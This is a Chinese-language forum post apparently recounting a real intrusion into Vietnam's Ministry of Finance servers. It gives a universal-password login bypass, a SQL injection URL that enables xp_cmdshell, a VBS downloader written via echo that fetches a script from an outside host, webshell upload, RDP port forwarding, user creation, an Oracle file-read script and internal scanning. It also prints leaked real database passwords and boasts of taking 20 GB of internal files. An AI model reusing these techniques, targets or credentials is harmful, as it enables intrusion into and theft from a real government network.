习科小黑板 - Silic Wiki

就这样。。。就来财政部了

Ping www.mof.gov.vn → 118.70.204.144

这种都到部委级别的站了，估计整个第4段ip全是它的。用iknock扫一下同C的ip段

于是先拿临近ip下手，也是财政部的机器，主站是144，看到有个存活的154的机器。

Ping msns.mof.gov.vn → 118.70.204.154

临近ip开放常用端口的机器不多，这个154居然用万能密码上去了，不知道什么的后台，但是从aspx中可以判断是台windows，拿来当跳板再好不过了。

  http://msns.mof.gov.vn/hagiang/login.aspx
  http://msns.mof.gov.vn/hagiang/adminlogin.aspx
  万能密码'or'1'='1
  后来添加的账号和密码silic1/silic1

添加信息看不懂。。。。上传上去下载方式不是物理路径，是变量形式的。
(一开始上去不是最高权限的账户，后来习科的大牛又提权的。。。后台提权。方法未知)

从添加和编辑的页面没有找到突破点(主要看不懂啊)，换个思路，点开右上角编辑个人资料页面，发现一个SA的注入点！

具体怎么研究的这个注入点，先来看一个语句

http://msns.mof.gov.vn/hagiang/iframe.aspx?page=account_edit&mode=edit&id=42+union+all+select+1,null,null,4,null,null,7,8,9,null,1,2,null,null,null,6,null,null,9,0,1,2,3;EXEC+sp_configure'show advanced options',1;RECONFIGURE;EXEC+sp_configure'xp_cmdshell',1;RECONFIGURE;select+1

第一步union出字段以后，发现表太多，支持多语句查询。但是执行exec xp_cmdshell发现报错。

多语句查询，SA权限，直接从注入点解禁xp_cmdshell，执行命令。
然后就开始各种exec_xpcmdshell执行命令。

分别ping和ipconfig了一下，发现ping不通外网，网关限制了。

 Connection-specific DNS Suffix  . :
 Link-local IPv6 Address . . . . . : fe80::7:b9c1:37ee:f06b%11
 IPv4 Address. . . . . . . . . . . : 10.192.246.45
 Subnet Mask . . . . . . . . . . . : 255.255.255.0
 Default Gateway . . . . . . . . . : 10.192.246.1

这台机器属于纯内网，通过网关开放80端口出来，从实际效果而言，除了80端口，其他任何端口都出不来外网，跟没联网差不多。
不管怎么样，先写上webshell再说吧，毕竟只开放80端口。

路径猜不到，靠工具跑盲注点太慢了。于是干脆执行echo命令写个读iis配置的vbs文件上去：

echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://silic.wiki/iis.vbs^",0:xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^"):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^"C:\c:\windows\temp\iis.vbs^",2 >c:\windows\temp\a.vbs

特殊字符需要前面加个^转义，可以本地自己echo测试

尝试着echo写一个下载文件的vbs脚本到系统。然后发现cscript执行这个echo的vbs不能成功下载(本地测试成功)，看来果然是出不去，只好把读取iis配置的vbs也echo上去了(很长很长很长很长)

总之最后是把webshell写上去了

这种除了80端口其他完全弹不出来的情况，上远控主机也无法上线。。还是研究怎么把3389转发出来吧。
reduh上去以后提示失败。。。于是核心群的大神找了一个神工具，原理和reduh一样，但是在此次渗透中，更实用+更稳定

D:\proxy\proxy.py -u http://msns.mof.gov.vn/hagiang/conn.aspx -l 1234 -r 3389 -v

通过MSSQL的xp_cmdshell添加了用户后成功登陆。

这台机器无法联网，DNS都解析不出来，传工具只能用webshell，每次只能传1MB左右的文件(速度还非常慢。。)
先看一下传上去的工具。。

目前还只用到这些，后期还会传nmap+wincap、Wireshark之类的，简直酸爽的不要不要的
读取了管理员的RDP记录，发现管理员没在服务器上登陆过别的机器的3389或者SSH，用iKnock扫了下内网，其中10.192.0.x这个ip段下只有一台Oracle主机存活，而10.192.246.45所在的ip段有多台主机存活

管理员登陆记录是很久以前的，所以wce并没有读到明文密码，对其他机器自然也有太好的直接下手的办法。

读取网站的web.config配置文件，发现的一些关键信息如下：

<connectionStrings>
        <add name="CAPMASO" connectionString="Data Source=localhost;Initial Catalog=DVHCC_CAPMASO;User ID=sa;Password=dvctt@123" providerName="System.Data.SqlClient" />
        <add name="DMDC_constr" connectionString="Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=10.192.0.23)(PORT=1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=DNS)));User ID=dns;Password=dn$2o12;" />
        <add name="DNS_constr" connectionString="Data Source=(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=10.192.0.23)(PORT=1521)))(CONNECT_DATA=(SERVER=DEDICATED)(SERVICE_NAME=DNS)));User ID=dns;Password=dn$2o12;" />
</connectionStrings>
<appSettings>
        <add key="AppTitle" value="D?ch v? c?ng tr?c tuy?n" />
        <add key="SoTaiChinhID" value="23" />
        <add key="DMDC" value="oracle" />
        <add key="IDTepTK" value="41832" />
        <add key="IDTepTK_XDCB" value="42521" />
        <add key="ServicesURL" value="http://10.192.246.45:8888/DNSWS/DNSServiceSoapHttpPort" />
        <add key="AppURL" value="http://msns.mof.gov.vn/" />
        <add key="KichHoatQuaEmail" value="0" />
        <add key="DiaBanID" value="12"/>
        <add key="CQTC_MA" value="1202"/>
        <add key="KhoBacCapTren" value="3449"/>
</appSettings>

有MSSQL的配置信息，有Oracle的配置信息。

关于MSSQL，库中的表都是越南语或者简写命名，太不好分辨哪些有价值哪些没价值了，所以直接用习科的MSSQL脱库工具，一键全脱，然后以关键字筛选后下载。

至于Oracle，找了很多工具，最后推荐一个精简不需要sqlplus的工具[url=http://www.sqltools.net/]SQL Tools[/url]
我们选择的是这个版本： 03.10.2011 SQLTools 1.5 RC1 build 22 (Zip) 1.12M

因为本机没有撞Oracle环境，这是连接串的设置，要在TNS那里选择Bypass tnsname.ora，并且勾上Use Service instead of sid

先试着用Oracle读文件试试吧

--查看当前的目录环境
SELECT * FROM dba_directories
--设置目录
create or replace directory FILENAME as 'C:\';
--创建写入内容的表
CREATE TABLE TEST(a VARCHAR2(4000),b VARCHAR2(4000));
--读取文件
DECLARE
  filehandle utl_file.file_type;
  filebuffer varchar(200);
   BEGIN
     filehandle := utl_file.fopen('FILENAME','boot.ini','r');
    loop
      begin
           utl_file.get_line(filehandle,filebuffer);
           INSERT INTO TEST(a) VALUES(filebuffer);
           EXCEPTION 
             WHEN no_data_found THEN 
             exit ; 
       End;
      END LOOP;
    utl_file.fclose(filehandle);
COMMIT;
END;

读取文本提示失败，但是写入文件似乎是成功了。

目前对于这台服务器的思路就是写入启动项一个bat，管理员重启机器的时候添加administrators的用户。。。但是这种时效性太差。
这期间nmap分为25个RAR包依次上传完毕，正好启动nmap扫一下10.192.0.23这台机器的端口

C:\Users\iis_user\Desktop\tools>nmap -p- 10.192.0.23

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2015-06-06 13:53 SE Asia Standard Time

Nmap scan report for 10.192.0.23 Host is up (0.0019s latency). Not shown: 999 filtered ports PORT STATE SERVICE 1521/tcp open oracle

Nmap done: 1 IP address (1 host up) scanned in 6.09 seconds

就在下一步一筹莫展的时候，从网络共享中发现了进一步的突破

\\Elearnapp2\e\Elearning\BackUp\Web
<add key="solrUrl" value="http://10.192.246.34:8983/solr" />
<add key="webrootpath" value="\\10.192.246.33\e\Elearning\Web" />
<add key="chatdomain" value="http://dtttmedia.mof.gov.vn/html/hello.html" />
<add key="learningComponentsConnnectionString" value="Server=10.192.0.31;Database=elearning_scorm;uid=sa;pwd=abcd@1234;" />
<add key="pathLiveWebinar" value="C:\Program Files\Red5\webapps\livewebinar\streams\" />

web.config文件中一些关键配置。其中10.192.0.31没有开放1433，但是机器存活。

配置中的dtttmedia.mof.gov.vn/html/hello.html页面存在。

因为所涉及太广，下了内网20G的文件，有机会会将所有笔记和文件发出来下载链接的